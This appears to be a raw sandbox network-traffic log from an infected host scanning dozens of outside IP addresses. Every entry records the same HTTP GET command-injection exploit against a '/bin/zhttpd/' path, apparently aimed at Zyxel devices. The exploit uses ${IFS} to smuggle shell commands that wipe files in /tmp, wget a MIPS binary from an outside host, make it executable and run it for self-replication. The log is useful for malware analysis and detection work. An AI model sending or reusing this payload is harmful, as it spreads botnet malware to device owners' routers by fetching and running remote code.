                                                        Feb 2, 2024 06:21:06.879085064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3728192.168.2.143488665.206.114.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879127979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3729192.168.2.145089277.9.179.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879156113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3730192.168.2.144900672.32.59.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879182100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3731192.168.2.1446750221.140.105.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879220009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3732192.168.2.14602421.187.107.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879234076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3733192.168.2.1451248152.82.89.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879268885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3734192.168.2.1455804166.190.46.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879301071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3735192.168.2.1453134137.3.219.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879336119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3736192.168.2.1457704146.147.147.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879369020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3737192.168.2.145756650.127.27.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879411936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3738192.168.2.143706466.75.86.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879453897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3739192.168.2.1460920216.186.80.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879476070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3740192.168.2.1442600115.176.211.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879513979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3741192.168.2.1442200136.205.185.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879573107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3742192.168.2.1436958145.198.144.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879611015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3743192.168.2.143389847.89.115.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879636049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3744192.168.2.1448276113.102.127.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879668951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3745192.168.2.1436516168.255.90.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879724026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3746192.168.2.1447654160.149.158.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879765034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3747192.168.2.145404814.157.81.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879811049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3748192.168.2.1446838166.54.81.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879848003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3749192.168.2.144830619.34.131.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879877090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3750192.168.2.144244631.188.184.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879903078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3751192.168.2.1450868128.186.150.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879956961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3752192.168.2.1443190111.153.171.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.879982948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3753192.168.2.1436982181.171.144.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880036116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3754192.168.2.143299262.64.208.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880089045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3755192.168.2.1457694220.145.199.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880127907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3756192.168.2.1439958133.195.234.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880156040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3757192.168.2.1444992140.50.187.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880208969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3758192.168.2.1459580223.252.15.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880237103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3759192.168.2.1450270108.26.103.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880276918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3760192.168.2.1442458153.241.26.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880327940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3761192.168.2.1433390177.44.1.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880366087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3762192.168.2.144090631.137.87.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880398035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3763192.168.2.1452154148.16.143.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880450964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3764192.168.2.144299663.36.147.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880456924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3765192.168.2.1452340134.156.88.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880505085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3766192.168.2.144193835.134.247.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880547047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3767192.168.2.1458628168.51.206.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880578041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3768192.168.2.1450070178.175.142.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880636930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3769192.168.2.143390488.25.127.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880666018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3770192.168.2.1458328138.226.138.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880692959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3771192.168.2.1451026140.204.182.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880728006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3772192.168.2.1455080110.17.201.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880789042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3773192.168.2.1437066136.123.211.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880812883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3774192.168.2.1435080193.124.84.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880846977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3775192.168.2.1453944180.237.176.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880882978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3776192.168.2.143761413.71.55.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880923986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3777192.168.2.143679895.191.147.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880948067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3778192.168.2.145283020.108.150.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.880995035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3779192.168.2.144299873.34.23.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881043911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3780192.168.2.1449550145.113.28.0443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881076097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3781192.168.2.1454392111.219.44.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881102085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3782192.168.2.143662699.83.203.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881136894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3783192.168.2.1456150216.141.213.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881192923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3784192.168.2.1433900119.201.230.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881232977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3785192.168.2.1456824129.99.71.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881294966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3786192.168.2.145184045.52.251.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881324053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3787192.168.2.144093475.153.125.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881354094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3788192.168.2.1439924105.174.4.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881411076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3789192.168.2.145277450.227.112.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881434917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3790192.168.2.145033634.24.32.168443
                                                        TimestampBytes transferredDirectionData
